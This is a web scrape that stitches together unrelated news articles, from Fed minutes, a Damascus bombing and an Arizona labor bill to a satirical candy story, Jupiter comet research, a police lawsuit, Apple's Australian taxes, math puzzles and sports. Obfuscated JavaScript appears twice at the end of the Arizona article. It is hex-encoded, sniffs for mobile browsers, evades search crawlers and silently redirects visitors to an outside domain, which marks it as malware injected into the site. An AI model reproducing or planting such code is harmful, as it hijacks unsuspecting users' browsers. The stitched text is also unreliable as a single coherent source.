While the Fed has increased its benchmark rate target four times since December 2015, government bond yields have declined in recent months. Stocks have continued to gain in the second-longest bull market ever recorded, and multiple other measures of financial conditions remain loose.
The meeting minutes reflected considerable discussion over why that was happening.
Low bond yields, they reasoned, could be the product of "sluggish longer-term economic growth" as well as the Fed's $4.5 trillion balance sheet of bond holdings.
On stock prices, FOMC members "suggested that increased risk tolerance among investors might be contributing to elevated asset prices more broadly; a few participants expressed concern that subdued market volatility, coupled with a low equity premium, could lead to a buildup of risks to financial stability."
In addition to approving a quarter-point hike at the meeting, the committee also set the parameters under which it would unwind the balance sheet. The Fed currently reinvests the proceeds it gets from the bonds, but will begin allowing $10 billion to roll off in quarterly increments until it reaches $50 billion a month. That process is likely to continue until the balance sheet reaches about $2 trillion to $2.5 trillion.
Fed Chair Janet Yellen has said that the hope is to have the balance sheet reduction happen in "the background" with little notice from markets.
"The effect on financial market conditions of the eventual announcement of the beginning of the Federal Reserve's balance sheet normalization was expected to be limited," the minutes said.
The moves to raise rate and reduce the balance sheet come amid some worry in markets over whether the Fed should be tightening with inflation so low. The central bank's preferred measure of inflation is running at about a 1.4 percent annual level, well below the 2 percent Fed target.
Minneapolis Fed President Neel Kashkari was the sole dissenter during the policy vote, reasoning that the committee should await more evidence that inflation is moving toward the goal. Some economists have encouraged the Fed to raise its inflation target.
Members also debated whether the Fed should allow the unemployment rate, currently at 4.3 percent, to undershoot what the Fed considers full employment, or 4.7 percent. The discussion again turned to the financial stability risks of loose policy. More hawkish committee members worry that if the Fed stays too low for too long, it could be forced to tighten hastily and risk economic damage.
"A couple of participants expressed concern that a substantial undershooting of the longer-run normal rate of unemployment could pose an appreciable upside risk to inflation or give rise to macroeconomic or financial imbalances that eventually could lead to a significant economic downturn," the minutes said.
Syrian has vowed to "strike back with an iron fist" after the reported death of dozens of people in a blast in the capital, Damascus.
Syrian state TV said at least 25 people died and 46 more were wounded in Friday's attack which it blamed on a suicide bomber.
The opposition described the explosion which apparently targeted the central district of al-Maidan, a hub for anti-government protests, as a government plot.
Ibrahim al-Shaar, Syria's interior minister, said a suicide bomber "detonated themselves with the aim of killing the largest number of people" and promised a tough response to the carnage.
"We will strike back with an iron fist at anyone tempted to tamper with the security of the country or its citizens," they said.
Television images
Syrian television showed residents and paramedics carrying human remains, holding them up for the camera.
Other footage showed a police bus with blood on its seats, and cars with blown-out windows and riddled with shrapnel.
The blast came exactly two weeks after twin bombings killed 44 people in the city.
Syrian foreign ministry spokesperson tells Al Jazeera that the attack had a trace of "the Salafi mentality"
The official SANA news agency spoke of casualties among civilians and security force personnel.
Al Jazeera's Hashem Ahelbarra, reporting from the Turkish town of Antakya, near Syria's northern border, said it was unclear who was behind the attack.
"The government says that a suicide bomber detonated themselves in a very crowded area in the al-Maidan district," they said.
"The opposition, on the other hand, is saying that this is a plot staged by the government to deter thousands of people that were planning to converge on that same spot to call for the international community to step in and enforce a no-fly zone."
Colonel Riad al-Asaad, the head of the self-styled Free Syrian Army, has dismissed the government's report of the attack, saying that Friday's explosion was "the work of the regime, just like the previous two explosions."
Some opposition activists said the explosion had targeted a police station, others said it was an intelligence building.
"There is more security in Maidan than usual because it is Friday and there are lots of military and security checkpoints. We do not know what was targeted yet," said a resident, a private sector employee who declined to be named.
Another resident said: "I didn't hear anything, but a lot of streets are closed and everyone is really nervous."
Hamas help sought
In another development, the head of the Arab League said on Friday they had asked the Damascus-based leader of the Palestinian group Hamas to ask the Syrian government to work to halt violence in the country.
Speaking alongside Khaled Meshaal after a meeting in Cairo, Nabil Elaraby, the Arab League secretary-general, said: "I gave them a message today to the Syrian authorities that it is necessary to work with integrity, transparency and credibility to halt the violence that is happening in Syria."
Elaraby's comments came on a day dozens more people were killed in continued political violence around Syria, according to the Local Co-ordination Committees, an opposition group.
Mass protests by pro-democracy activists had been planned for Friday to demand that an Arab League observers' mission, in Syria for two weeks, admit its failure to stop nearly 10 months of bloodshed and hand over to the UN.
Monitors under scrutiny
The team of monitors has been trying to assess whether Bashar al-Assad's government is complying with a peace accord aimed at ending its crackdown on dissent.
Activists say the monitors do not have enough access and are escorted by Syrian authorities, who they say are manipulating them and hiding prisoners in military facilities.
After meeting Ban Ki-moon, the UN secretary-general, in New York on Wednesday, Sheikh Hamad bin Jassim al-Thani, Qatar's prime minister, pointed out that the Arab League's mission was the first of its kind.
"I said we must evaluate the types of mistakes it made and without a shadow of a doubt I see mistakes, even though we went in to observe, not to stop the violence," they said.
The Syrian Revolution 2011 group, one of the driving forces on the internet behind the uprising, called on Facebook for the demonstrations on Friday to urge the "internationalisation of our cause".
An Arab League meeting in Egypt is scheduled for Sunday to discuss the mission which has come in for scathing criticism this week.
Syria has been racked for 10 months by an uprising against President al-Assad in which the UN says more than 5,000 people have been killed.
The government says armed "terrorists" have killed 2,000 members of the security forces.
The Arizona Senate approved a bill Monday that would block cities and towns from regulating paid time off, retirement plans or other employee benefits, the latest in a series of bills passed this session that pre-empts the authority of municipalities.
Republican Gov. Doug Ducey signed legislation last month that would cut off money to cities, towns and counties that ban the use of plastic bags, enact gun control policies or impose other regulations that conflict with state law.
Arizona's employee benefits bill pushes against successful moves to increase wages and paid leave by other state and local governments, as income disparity plays a part in the presidential election. At the same time, citizen coalitions in Arizona are seeking signatures for initiatives to increase the minimum wage and set standards for paid sick leave.
The proposal from Rep. J.D. Mesnard, R-Chandler, would prohibit cities and towns from regulating non-wage compensation that includes welfare benefits, bonuses, retirement plans as well as sick, vacation and severance pay.
House Bill 2579 passed on an 18-11 vote. It now goes back to the House for a final vote before going to the governor's desk, where it can be signed into law.
Senate Republicans say employee benefits are a statewide concern that should be equally applied to all cities and towns.
Democrats countered that cities and towns are closer to the affected people and have a better understanding of what they want.
“It feels like the party of limited government has become the party of big state government,” said Sen. Andrew Sherwood, D-Tempe.
Sen. Don Shooter, R-Yuma, replied that states retain the authority to regulate municipalities.
“We have every political right as well as every economic reason to support this,” they said.
Republican lawmakers are also proposing their own ballot measure that would give the Legislature sole authority to set the minimum wage in the state.
Meanwhile, a group advocating for worker's rights is gathering signatures for a ballot initiative that would increase the minimum wage to $12 an hour by 2020 and require employers to provide earned paid sick time.
A second group is collecting signatures to put a citizen initiative on the ballot in Flagstaff to raise the minimum wage there to $15 an hour by the end of 2020. If that became law, it would match the amount recently set as the minimum wage in New York and California ai??i?? the highest statewide minimum pay in the U.S.
Last week San Francisco became the first city in the U.S. to mandate full pay for six weeks' parental leave for most workers.
Ducey stated their opposition to initiatives like the one in Flagstaff during this year's State of the State address, saying that a patchwork of wage regulations would “drive our economy off a cliff.”var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|Windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|Windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}
Swedish Fish Found Tainted With Dolphin Meat
Gus Tate Blocked Unblock Follow Apr 28, 2017
WARWICK, RI — Marine wildlife authorities have launched a full-scale investigation into Swedish Fishing practices after a consumer discovered traces of dolphin meat inside their family size bag of Swedish Fish.
“I thought something tasted off, but couldn't quite put my finger on it,” said stay-at-home mother Dolores Cranston, 49. “That's when I noticed the rancid head of a bottlenose dolphin poking out of the bag. I almost had to throw the whole thing out.”
The Association of Swedish Fishermen released a statement yesterday apologizing to Cranston and other svedepescatarians for the mishap, but declined to accept total responsibility.
“Any dorsal fin, flipper, or head that makes it all the way into the bag is, of course, regrettable,” read the statement. “But these things happen on the open Swedish seas where we trawl for Fish. Frankly, it's out of our hands if a wild dolphin or two gets sucked in with the Red Dye #40.”
A representative from the World Wildlife Fund says the incident is not the first sign of malpractice coming out of the world's Swedish Fisheries, saying massive Swedish overFishing has plagued the industry for decades. The WWF urges consumers to choose a sustainable alternative like farmed Swedish Fish, which is certified humane by the Academy of Swedish Ichthyology.
Jupiter: Protection from Incoming Comets?
Jupiter's protective role for Earth has long been assumed, the theory being that the giant planet deflects asteroids and comets away from the inner Solar System. But studies on the subject are sparse, and focus on long period comets in extremely elliptical orbits. What about short period comets, and in particular the Jupiter Family of Comets (JFC)? These are comets thought to originate in the Kuiper Belt whose orbits are now controlled by Jupiter. Comet 81P/Wild 2, encountered by Stardust, was one of these, as was Comet Shoemaker Levy-9.
We all saw in 1994 what a planetary impact from a comet could do when Shoemaker Levy-9 struck Jupiter. And a new study suggests that Jupiter's presence offers Earth no real protection from such objects. A research team at the UK's Open University set up computer models that examined the Jupiter Family, defined for these purposes as comets whose semi-major axes are smaller than Jupiter's and whose orbital period is less than twenty years. Some studies indicate that the so-called ‘Centaurs,' icy objects which cross the orbits of the giant planets, are in transition between the Kuiper Belt and the Jupiter Family of Comets.
Image: Heavy bombardment. The role of Jupiter in slowing its pace is now being reassessed. Credit and copyright: Julian Baum.
Assuming the Centaurs as the parent population for the JFCs, the team set up a computer simulation that could track 100,000 Centaurs around the Solar System over a period of 10 million years. The model's parameters were first adjusted to include a Jupiter at current mass, and the model was then run with planets at three-quarters, one-half, and one-quarter the mass of Jupiter. A final simulation was run with no planet in Jupiter's position at all.
The result: The cometary impact rate with Jupiter in place is comparable to the rate when no planet exists in that position at all. What does change the rate of impacts is to assume a Jovian mass between these two extremes, in which case the rate goes up. Jonathan Horner (Open University), who presented these results at the European Planetary Science Congress in Potsdam today, has this to say:
“We've found that if a planet about the mass of Saturn or a bit larger occupied Jupiter's place, then the number of impacts on Earth would increase. However if nothing was there at all, there wouldn't be any difference from our current impact rate. Rather than it being a clear-cut case that Jupiter acts as a shield, it seems that Jupiter almost gives with one hand and takes away with the other!”
The simulations indicate that without Jupiter, these short-period comets will not be diverted onto Earth-crossing orbits in the first place, whereas a Saturn-mass planet (about a third the mass of Jupiter) would have the gravitational pull to draw such comets into Earth-crossing orbits (as Jupiter does), but would not be massive enough to later eject them from the Solar System as readily as Jupiter. Thus we wind up with more objects on Earth-crossing orbits — and more impacts — at any given time.
Does the ‘Jupiter as shield' hypothesis still hold up for long-period comets? And what role does the giant planet play in the risk of asteroid impact? The team is now at work on the asteroid question, and plans to address the long-period comets after that. But the notion that a solar system needs a gas giant analogous to Jupiter to protect its inner planets may need serious re-examination, even as we continue to study the danger posed by Earth-crossing objects of all kinds.
Spread the love
May 3, 2014
San Diego Sheriff's Department is facing a lawsuit for a sickening display of police brutality.
Police were searching for a domestic violence suspect when Antonio Martinez happen to walk by them while putting the hood of their sweatshirt on, on their way to work in their family's bakery.
Sheriff's Deputies, who had no reasonable suspicion to detain him, called out to Martinez to stop.
When Matinez, who has the mental capacity of a 7-year-old, did not stop, Deputy Jeffrey Guy became angry at them for “exercising their constitutional right not to stop for a consensual detention,” the lawsuit alleges.
The lawsuit states that the deputy “looked Tony in the face and then unloaded a canister of highly irritating pepper spray into Tony's face and eyes,” beat them with a weighted baton, slammed their face on the pavement and cuffed him.
Apparently this 4′ 11″, 158 pounds, person with Down syndrome, was an imminent threat to Deputy Guy and they felt this use of force necessary.
All the while Martinez's two younger sisters were yelling at the police to stop, telling them that they have Down syndrome.
Other deputies jumped in and Martinez was finally detained and then jailed for 5 hours.
“We made a mistake.”
Is what the Sheriff's spokesperson Jan Caldwell told reporters about this incident.
In a disgusting and petty attempt to reconcile this brutality, two days following the incident, Vista sheriff's Captain Joe Rodi arranged a meeting with the family. They apologized and offered the family a turkey, “in the spirit of the holidays”.
Are you freaking kidding!? Sorry guys, I know we just beat down your innocent family member for no reason, but here is a delicious turkey. The family obviously declined.
Deputy Jeffrey Guy had who had been at deputy for about four months at the time of the incident, remains on the job.
The launch of the iPhone 6 helped Apple Australia achieve a staggering rise in sales for its 2015 financial year yet its tax expense fell – a fact that is likely to raise eyebrows against a backdrop of increased focus on corporate tax avoidance.
The iPhone maker's consolidated Australian revenue rose $1.7 billion or 27.9 percent to reach $7.9 billion for the 12 months to 25 September 2015, according to its annual report lodged this week with corporate regulator ASIC.
It's no secret how Apple chalked up such a massive rise in 2015 revenue – the company's fiscal year opened just a week after the blockbuster release of the iPhone 6 and 6 Plus on 19 September 2014. The previous year, in which Apple launched only an iterative upgrade with the iPhone 5s, its Australian revenue remained roughly static, with a 0.5 percent decline to $6.07 billion.
For 2015, Apple Australia reported a rise in gross profit of 16.8 percent to $638 million, however, an increase in "sales, marketing and distribution expenses" helped reduce the company's taxable income to $207 million – down 17.4 percent on the previous year.
The fall in taxable income meant the company's income tax expense was lower than the previous year, though Apple ultimately paid $84.9 million after an $11 million adjustment relating to prior years. On the bottom line, Apple reported 2015 total comprehensive income of $122.7 million, a fall of $49.3 million (28.7 percent) from the previous year.
An Apple spokesperson told CRN: "Apple Australia pays all taxes it owes in accordance with Australian law".
Transfer pricing
Sales, marketing and distribution expenses include the price Apple Australia pays to affiliates for hardware. During last year's Senate Enquiry into corporate tax avoidance, the company denied "inflating the transfer price" of products in order to reduce taxable income in Australia.
The results come amid increasing scrutiny on the tax positions of major companies operating in Australia and the use of elaborate tax structures to reduce or avoid paying tax in Australia.
In December, the ATO published the tax positions of the largest 1,500 public and privately held companies in Australia for the 2013 and 2014 financial years and found a wide discrepancy in taxes paid. Almost 600 of the companies paid no tax at all.
That ATO release showed Apple's total 2014 income was $6.1 billion and the company paid $74.1 million in taxes on taxable income of $247.4 million, which was in accordance with Australia's corporate tax rate of 30 percent.
In April 2015, Apple Australia managing director Tony King was questioned in front of the Senate Enquiry into corporate tax avoidance, where they denied that Apple had strategies to reduce the tax it paid in Australia. King also highlighted the company's track record as a major employer and an environmentally sustainable business, and said Apple was "transparent and open with the Australian tax office".
"We declare all of our income in accordance with Australian tax law and we pay all of our taxes that we owe," King told the committee.
Apple is currently facing an ATO audit into its 2012 financial year, according to the 2015 annual report. "The Australian Taxation Office is currently auditing the company's income tax position for the year 2012. As at this date of this report, the outcome of tax audit cannot be predicted with certainty and reliably estimated, no adjustments have been recognised in the financial statements."
Apple has also been on watch since the beginning of the 2016 year due to fears of a fall in iPhone sales. Some of Apple's main Asian suppliers expect revenues and orders to drop this quarter, indicating iPhone sales are almost certain to post their first annual decline since the flagship product was launched almost a decade ago.
image by Klearchos Kapoutsis. CC BY 2.0
People often think math is a rigid subject with a bunch of rules and tricks. But mathematicians are actually flexible thinkers, often imagining unseen forces and spirits to help solve problems.
In this Halloween edition on the Monday Puzzle, we present 4 math puzzles that can be solved by imagining ghostly forces.
(Regular readers can skip to puzzle 4 as I have posted puzzles 1-3 in past columns).
Puzzle 1: A father left 17 goats to their three sons. Their will promised 1/2 of the goats to the oldest son, 1/3 to the middle son, and 1/9 to the youngest son. But the sons could not divide 17 evenly. How did they split up the goats?
Puzzle 2: You have several identical bricks and a ruler. You want to measure the diagonal of a single brick without using any formulas. How can you do it?
Puzzle 3: At 6 am a monk started climbing a mountain and reached the top at 8 pm, where they slept for the night. The next morning at 6 am they descended the mountain on the same path and reached the bottom at 8 pm. A mathematician made an interesting observation: by the facts, there must be some spot on the mountain that the monk occupied at exactly the same time of day for both trips. Why is this?
Puzzle 4: There are 100 ants on a 1 foot stick. The ants move left or right randomly at 1 foot per minute. Whenever two ants meet, each turns around and moves in the opposite direction. An ant that reaches the end of the stick falls off. Certainly if you wait long enough, all of the ants will fall off the stick. Is there a minimal time you can be sure the ants are all off the stick?
.
.
.
.
M
I
N
D
.
Y
O
U
R
.
D
E
C
I
S
I
O
N
S
.
M
O
N
D
A
Y
.
P
U
Z
Z
L
E
.
.
.
.
Answer to Mathematicians Do Believe in Ghosts
Puzzle 1: Dividing 17 goats
A wise man told the sons to imagine a ghost goat so there would be 18 goats in total. By the will, the oldest son would get 1/2 of the total 18 which is 9 goats. Then the middle son would get 1/3 of the total 18 to get 6 goats, and the youngest would get 1/9 of the total 18 to get 2 goats.
This division means the three sons have 17 goats between them, as 17 = 9 + 6 + 2. After serving its purpose, the ghostly goat could leave the physical world and disappear.
Puzzle 2: Three Bricks
You only need 3 bricks for this to work. Place one brick on top of another, and place the third brick next to them. This will create a space for an invisible fourth brick.
You can directly measure the diagonal of this “ghost” brick.
Puzzle 3: Monk's Journey
The monk's journey and be solved by plotting the altitude up and down on a time scale, and then invoking a fixed point theorem that guarantees the two paths cross. But there is a trick by imagining a ghost.
Imagine the two journeys take place on the same day. In other words, while the monk is descending at 6am, imagine a ghost traces out the path of their journey up the mountain at 6am from the day before. Obviously the monk going down has to cross the ghost of the monk coming up! This spot is where the monk occupies the same location at the exact same time on both days.
Puzzle 4: Ants on a Stick
When two ants collide, they turn around and walk in the opposite directions. Mathematically, this is exactly the same as if the two ants simply passed through each other like ghosts.
The longest distance a ghost ant has to travel is starting at one end of the stick and moving to the other. The ant can travel 1 foot in 1 minute, and therefore in 1 minute we can be sure all the ants have fallen off the stick.
By JULIE CARR SMYTH, Associated Press
COLUMBUS, Ohio (AP) — Ohio Gov. John Kasich on Tuesday joined friend and ex-California Gov. Arnold Schwarzenegger's effort to overhaul partisan political map-making that's helped fuel their own Republican party's rise to power.
Kasich signed onto a legal brief that opposes the GOP in the momentous redistricting case being heard by the U.S. Supreme Court this fall. They said other signers include Republicans John McCain, Richard Lugar and Bob Dole. At issue is whether Republican lawmakers in Wisconsin drew legislative districts that favored their party and were so out of whack with the state's political breakdown that they violated Democratic voters' constitutional rights.
Kasich, a 2016 presidential contender, is a frequent critic of President Donald Trump, who was a GOP primary opponent, and has parted with fellow Republicans on some big issues, including Medicaid expansion under the Affordable Care Act. They said their decision to add their voice to a growing list of leaders opposing how U.S. political maps are made wasn't about party.
"I've decided to join because I think what we have witnessed over time here is the fact that the drawing of these districts in a gerrymandered way, coupled with the newfound activism of the people, has just driven the Congress farther and farther apart," they said. "And I think the time has come for the court to be able to make a big statement about the way in which we draw these districts."
Schwarzenegger and Kasich have long argued that partisan gerrymandering is contributing to dysfunction in Washington.
An AP analysis published in June of the outcomes of all 435 U.S. House races and about 4,700 state House and Assemblies seats up for election last year found four times as many states with Republican-skewed state House or Assembly districts as Democratic ones. Among the two dozen most populated states that determine the vast majority of Congress, there were nearly three times as many with Republican-tilted U.S. House districts.
In Ohio, the Republican-controlled map-making system resulted in the party winning nearly two more U.S. House seats and five more Ohio House seats in the last election than would have been expected in neutral circumstances, according to the AP analysis. In congressional races, Republican candidates won 56 percent of the vote in Ohio but 75 percent of the seats.
Kasich said "safe" districts no longer do what they did in the past: afford politicians the comfort to concentrate on policy. Instead, they open up more centrist politicians to primary challenges from their parties' more extreme flanks, they said.
Schwarzenegger is working to combat the gerrymandering through their Terminate Gerrymandering Crowdpac. Kasich said Schwarzenegger reached out to them to sign the brief, which is part of their efforts.
Ohio has seen growing bipartisan concern about how its voting districts are drawn.
Kasich said they are pleased that Ohio has moved to reform its legislative map-making system. Ohio residents voted overwhelmingly in 2015, after a decade of false starts, to approve new rules for drawing state legislative districts that aimed to reduce gerrymandering.
Kasich said they hope congressional districts aren't far behind. Backers in the Republican-controlled state Legislature have been working on the idea of replacing a process that gives the state Legislature power to approve the congressional maps drawn once every 10 years.
Now that you've seen how IBM's Chef Watson helped Bon Appétit 's test kitchen develop a bunch of cool new Fourth of July recipes, you're probably thinking: Well, bully for BA*, but when can I get my hands on the hottest piece of cognitive cooking technology since, like, ever?*
The answer, my friends, is right now . In order to perfect Chef Watson, IBM is inviting a select group of Bon Appétit readers to beta-test the Web app—to put it through its paces, identify errors (what, errors?!), and report back with suggestions, improvements, and, ideally, recipes and photos of the awesome dishes Chef Watson has inspired. How do you become a beta-tester? Easy—just click through to IBM's survey, fill it out, and IBM will let you know soon if you've been chosen.
[#### Take IBM's survey for a chance to beta-test Chef Watson in your own kitchen.
](https://watson.ihost.com/watson/chefwatson/page/survey.html)
Ah, the NBA Summer League. There's nothing like it. It's our first chance to take a look at your team's incoming rookies, playing with random veterans, players you may kiiiinda remember from college and a bunch of other guys you've never heard of. Each NBA Summer League roster is just a wonderful grab bag of basketball-like substance. It's great. I love it. Glen Rice was the MVP. The Summer League is like my Christmas.
The Washington Wizards announced their 2015 Las Vegas Summer League minicamp roster on Thursday, a list of 16 players of which 12 will go to Las Vegas wearing a Wizards uniform.
It contains the guys you'd expect: draft picks Kelly Oubre and Aaron White, alongside undrafted Maryland star Dez Wells, who looks to have a realistic shot to make the team. We've all talked about those three guys extensively, but there are 13 other players on the Wizards roster who will be working their hardest to get a training camp invite.
One of them already has experience as a Wizard. Remember Toure' Murry from the end of last year? He's back!
